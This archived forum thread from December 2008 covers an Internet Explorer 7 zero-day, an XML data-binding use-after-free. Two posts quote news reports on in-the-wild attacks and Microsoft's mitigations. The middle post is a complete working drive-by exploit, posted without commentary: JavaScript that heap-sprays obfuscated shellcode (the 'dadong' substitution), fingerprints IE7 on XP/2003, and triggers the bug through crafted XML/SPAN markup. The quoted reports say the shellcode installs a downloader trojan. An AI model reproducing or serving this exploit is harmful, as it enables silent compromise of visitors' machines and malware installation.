PDA

Просмотр полной версии : zero day exploit (fully-patched) IE 7

Fugitif
10.12.2008, 02:51
Security researchers are reporting in-the-wild attacks targeting a previously unknown vulnerability in fully patched versions of Microsoft's Internet Explorer browser.

Internet users located in China report infections that result when using IE 7 to browse booby-trapped websites. Researchers from McAfee investigated the matter and found the exploits successfully target the Microsoft browser on both Windows XP Service Pack 3 and Vista SP 1.

The exploits contain shellcode that installs the Downloader-AZN, a well-known trojan that hijacks a PC's configuration settings and downloads additional pieces of malware. Anti-virus software from McAfee, and presumably other companies, detects the trojan - though at the time of writing, it appeared they didn't yet detect the zero-day exploit itself.

The attacks target a flaw in the way IE handles certain types of data that use the extensible markup language, or XML, format. The bug references already freed memory in the mshtml.dll file. According to IDG News, exploits work about one in three times, and only after a victim has visited a website that serves a malicious piece of javascript.

Microsoft researchers are looking in to the reports, a company spokesman said.

The reports came just hours ahead of Patch Tuesday, Microsoft's monthly release of security updates. The patches include a cumulative update for IE.

Source (http://www.theregister.co.uk/2008/12/09/zero_day_ie_flaw_exploited/)
BlackSun
11.12.2008, 10:24
<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");

function sleep(milliseconds)
{
var start=new Date().getTime();

for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
}

function spray(sc)
{
var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2;
var szlong=heapBlockSize-(payLoadSize+0x038);
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
}

function getSampleValue(retVal,szlong)
{
while(retVal.length*2<szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}

var a1="dadong";
spray(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824 dadong5858dadong3358dadongB3DBdadong031Cdadong31C3 dadong66C9dadongE981dadongFA65dadong3080dadong4021 dadongFAE2dadong17C9dadong2122dadong4921dadong0121 dadong2121dadong214BdadongF1DEdadong2198dadong2131 dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DE dadongD7C9dadongDEDEdadongC9DEdadong221Cdadong2121 dadongD9AAdadong19C9dadong2121dadongC921dadong206C dadong2121dadong67C9dadong2121dadongC921dadong22FA dadong2121dadongD9AAdadong03C9dadong2121dadongC921 dadong2065dadong2121dadong11C9dadong2121dadongC921 dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121 dadongC921dadong2040dadong2121dadong3BC9dadong2121 dadongCA21dadong7279dadongFDAAdadong4B72dadong4961 dadong3121dadong2121dadongC976dadong2390dadong2121 dadongC4C9dadong2121dadong7921dadong72E2dadongFDAA dadong4B72dadong4901dadong3121dadong2121dadongC976 dadong23B8dadong2121dadongECC9dadong2121dadong7921 dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9 dadong68E8dadongE112dadongE291dadongD3DDdadongAC8F dadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99 dadong7EA8dadong4720dadongE61Fdadong2466dadongC1DE dadongC8E2dadong25B4dadong2121dadongA07Adadong35CD dadong2120dadongAA21dadong1FF5dadong23E6dadong4C42 dadong0145dadongE61Fdadong2563dadong420Edadong0301 dadongE3A2dadong1229dadong71E1dadong4971dadong2025 dadong2121dadong7273dadongC971dadong22E0dadong2121 dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29 dadong39ABdadongFAA5dadong2255dadongCA61dadong1FD7 dadong21E7dadong1203dadong1FF3dadong71A9dadongA220 dadong75CDdadongE112dadongFA12dadongEDAAdadongD9A2 dadong5C75dadong1F28dadong3DA8dadongA220dadong25E1 dadongD3CAdadongEDAAdadongF8AAdadongE2A2dadong1231 dadong1FE1dadong62E6dadong200Ddadong2121dadong7021 dadong7172dadong7171dadong7171dadong7671dadongC971 dadong2218dadong2121dadong38C9dadong2121dadong4521 dadong2580dadong2121dadongAC21dadong4181dadongDEDE dadongC9DEdadong2216dadong2121dadongFA12dadong7272 dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819 dadong2E54dadong59A0dadongB124dadongB1B1dadong55B1 dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1 dadongDE0FdadongDEDEdadongC9E2dadongDE09dadongDEDE dadong3099dadong2520dadongE3A1dadong212Ddadong3AC9 dadongDEDEdadong12DEdadong71E1dadongC975dadong2175 dadong2121dadongC971dadong23AAdadong2121dadongF1DE dadongA117dadong051Ddadong5621dadongC92Bdadong2360 dadong2121dadongDE12dadongDE76dadongC9F1dadong20DA dadong2121dadongDE49dadong2121dadongDE21dadongC9F1 dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1 dadongC975dadong213Fdadong2121dadongC971dadong2374 dadong2121dadongF1DEdadongA117dadong051Ddadong5621 dadongC92Bdadong232Adadong2121dadongDE12dadongDE76 dadong79F1dadong7E7FdadongE27Adadong23CAdadongE279 dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CD dadongDDAAdadong294Bdadong1F76dadong56DEdadongC935 dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049 dadong444Cdadong4921dadong6468dadong5367dadongD5AA dadong2998dadong2121dadongD221dadong5487dadong4B0E dadong1F21dadong55DEdadong0105dadong05C9dadong2123 dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121 dadongF1DEdadongD91Adadong2955dadongAA17dadong0565 dadong1F01dadong21DEdadongDE1Fdadong0555dadongC93D dadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31 dadong997Fdadong2120dadong2121dadong49E2dadong4F4E dadong2121dadong5449dadong4D53dadongCA4CdadongAC34 dadong0565dadong7125dadong03C9dadongDEDFdadong71DE dadong6BC9dadong2123dadongC821dadongDFC3dadongDEDE dadongC7C9dadongDEDEdadongA2DEdadong29E5dadong4BE2 dadong494Ddadong554Fdadong4D45dadong34CAdadong65AC dadong2505dadongC971dadongDCDAdadongDEDEdadongC971 dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DE dadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249 dadong2113dadong4921dadong5254dadong5344dadong34CA dadong65ACdadong2505dadongC971dadongDCF0dadongDEDE dadongC971dadong20D8dadong2121dadongB0C8dadongDEDF dadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229 dadong4249dadong5657dadong4921dadong4952dadong4E45 dadong34CAdadong65ACdadong2505dadongC971dadongDC86 dadongDEDEdadongC971dadong20EEdadong2121dadong46C8 dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2 dadongE229dadong5749dadong5946dadongCA21dadongAC34 dadong0565dadong7125dadongA3C9dadongDEDCdadong71DE dadong8BC9dadong2120dadongC821dadongDF63dadongDEDE dadongC7C9dadongDEDEdadongA2DEdadong25E5dadongC9E2 dadong208Adadong2121dadong3A49dadong67E7dadong7158 dadongE7C9dadong2120dadongA221dadong29E5dadongC9E2 dadong20B6dadong2121dadongCD49dadong22B6dadong712D dadong93C9dadong2120dadongA221dadong29E5dadongC9E2 dadong20A2dadong2121dadong8B49dadong2CDDdadong715D dadongBFC9dadong2120dadongA221dadong29E5dadongC9E2 dadong204Edadong2121dadongCC49dadongCE77dadong7117 dadongABC9dadong2120dadongA221dadong29E5dadongC9E2 dadong207Adadong2121dadongD149dadong25ABdadong717E dadong57C9dadong2120dadongA221dadong29E5dadongC9E2 dadongDFD6dadongDEDEdadong5949dadongFA49dadong713D dadong43C9dadong2120dadongA221dadong29E5dadongC9E2 dadong2012dadong2121dadongCE49dadongC1EFdadong7141 dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2 dadong203Edadong2121dadong9149dadong0C68dadong71FA dadong1BC9dadong2120dadongA221dadong29E5dadongC9E2 dadongDE17dadongDEDEdadong8A49dadongBA7Fdadong713F dadong07C9dadong2120dadongA221dadong29E5dadongC9E2 dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123 dadong33C9dadong2120dadongA221dadong29E5dadongC9E2 dadong21C2dadong2121dadong5F49dadongC3F9dadong7152 dadongDFC9dadong2121dadongA221dadong29E5dadongC9E2 dadong21EEdadong2121dadongBF49dadong9AD8dadong7114 dadongCBC9dadong2121dadongA221dadong29E5dadongC9E2 dadongDFB3dadongDEDEdadong7649dadong9481dadong719A dadongF7C9dadong2121dadongA221dadong29E5dadongC9E2 dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123 dadongE3C9dadong2121dadongA221dadong29E5dadongC9E2 dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5 dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2 dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182 dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2 dadongDF63dadongDEDEdadong4949dadongE405dadong7192 dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2 dadong2176dadong2121dadong5349dadong92DFdadong7137 dadong53C9dadong2121dadongA221dadong29E5dadongC9E2 dadongDF65dadongDEDEdadong32CAdadong444BdadongC971 dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDE dadong96C8dadongDEDDdadongC9DEdadongDEC9dadongDEDE dadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECE dadong7124dadong1FC9dadong2121dadongA221dadong29E5 dadongC9E2dadong212Edadong2121dadongAF49dadong2F6F dadong71CDdadong0BC9dadong2121dadongA221dadong29E5 dadong12E2dadong45E1dadong61AAdadongA411dadong59E1 dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3D dadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AA dadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2 dadongAA17dadong054Ddadong1705dadong64AAdadong171D dadong75AAdadong5924dadongF422dadongAA1Fdadong396B dadongAA1Fdadong017BdadongFC22dadong1AC2dadong1F68 dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1 dadongA58Ddadong55E1dadongE026dadong2CEEdadongD922 dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFE dadong7BAAdadong2205dadong47FCdadongAA1Fdadong6A2D dadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25 dadongE422dadongA817dadong0565dadong403DdadongC9E2 dadongDA47dadongDEDEdadong5549dadong5155dadong0E1B dadong560Edadong5656dadong430Fdadong4840dadong444A dadong0F42dadong4F42dadong450Edadong564Edadong0E4F dadong4E4Adadong440Fdadong4459dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong0021");

sleep(3000);

nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
version=parseFloat(navigator.appVersion.split('MSI E')[1])
}
if(version==7)
{
w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://rਊr.book.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');
var i=1;while(i<=10)
{
window.status=" ";i++}
}
</script>
Fugitif
13.12.2008, 06:42
Internet Explorer 6 and 8 also affected by zero-day vulnerability

Microsoft says Internet Explorer 5.01, 6 and 8 (beta) are also potentially susceptible to the zero-day exploit, published recently. Until now it had been assumed that only Internet Explorer 7 contained the vulnerability. However, no attacks on versions 6 and 8 have yet been observed. As a result of revising its security instructions for different versions, Microsoft has highlighted further measures users can take to defend their systems against attacks until a patch is provided.

Microsoft recommends that Data Execution Prevention (DEP) and memory protection be enabled in Internet Explorer 7 (Tools/Internet Options/Advanced/Enable memory protection...), but this can only be done in the browser itself in the 32-bit version of Vista. In the 64-bit version of Vista, DEP is automatically globally enabled. Configuring this option via browser settings is not a possibility under Windows XP. Instead, users have to activate DEP for the complete system via System/Advanced/Performance/Settings/Data Execution Prevention.

However, H. D. Moore has recently published a Metasploit module for the exploit. When tested by heise Security, this evaded Data Execution Prevention under both Windows XP SP2 and Vista, and ran injected code. In his module, Moore used the techniques published by Alexander Sotirov and Mark Dowd in mid-year.

Microsoft further recommends that the Internet zone security setting be set to "High", and that access to the oledb32.dll library be prevented. This, it says, is the most reliable protection at present. The Microsoft Security Advisory gives full instructions for each operating system.

The Internet Storm Center meanwhile reports that the exploit appears to be foisted on harmless web sites by SQL injection. Since the exploit code has been known for some days, it is likely that such attacks will shortly multiply. Administrators should keep an eye on their servers in the next few weeks and check their logs for this kind of suspicious activity.

Danish security company Secunia say in their blog, that this is not a problem with XML as at first thought, but with data binding.

Source (http://www.heise-online.co.uk/security/Internet-Explorer-6-and-8-also-affected-by-zero-day-vulnerability--/news/112240)

so IE sucks anyway :)